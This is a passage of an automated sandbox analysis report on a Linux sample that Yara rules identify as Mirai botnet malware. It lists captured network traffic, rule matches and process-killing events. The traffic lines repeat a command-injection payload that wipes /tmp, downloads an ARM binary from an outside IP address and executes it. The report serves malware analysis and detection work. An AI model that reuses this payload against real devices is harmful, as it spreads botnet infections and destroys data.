    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Sample tries to kill multiple processes (SIGKILL)Show sources
    Source: /tmp/VAkpLB9NSD (PID: 5275)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5275, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 491, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 658, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 721, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 761, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 772, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 774, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 777, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 785, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 793, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1344, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1860, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 1886, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 2048, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5037, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5176, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5177, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5280, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5281, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5308, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5360, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5375, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5448, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5452, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5571, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5572, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5578, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5635, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5659, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5664, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5675, result: successfulJump to behavior
    Source: /tmp/VAkpLB9NSD (PID: 5278)SIGKILL sent: pid: 5680, result: successful